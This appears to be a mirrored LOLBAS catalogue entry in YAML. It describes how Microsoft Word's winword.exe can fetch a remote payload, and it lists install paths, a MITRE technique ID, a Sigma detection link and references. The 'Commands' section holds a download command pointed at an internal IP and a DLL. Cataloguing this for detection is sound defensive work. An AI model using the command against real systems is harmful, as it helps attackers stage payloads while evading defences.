public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-10-23 00:58:42 +02:00
Code Issues Projects Releases Wiki Activity
d21ae223eb
LOLBAS/yml/OtherMSBinaries/Winword.yml
frack113 1072d3dc34
Add sigma ref Detection (#272) 
* Add sigma ref

* Add missing sigma ref

* Fix sigma link

* Remove by Defender

* Remove by Defender
2022-12-29 09:51:15 -05:00

42 lines
2.1 KiB
YAML
Raw Blame History

---
Name: Winword.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
- Path: C:\Program Files\Microsoft Office\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
- Path: C:\Program Files\Microsoft Office\Office15\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
- Path: C:\Program Files\Microsoft Office\Office14\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml
- IOC: Suspicious Office application Internet/network traffic
Resources:
- Link: https://twitter.com/reegun21/status/1150032506504151040
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
- Person: 'Reegun J (OCBC Bank)'
Handle: '@reegun21'
Reference in New Issue View Git Blame Copy Permalink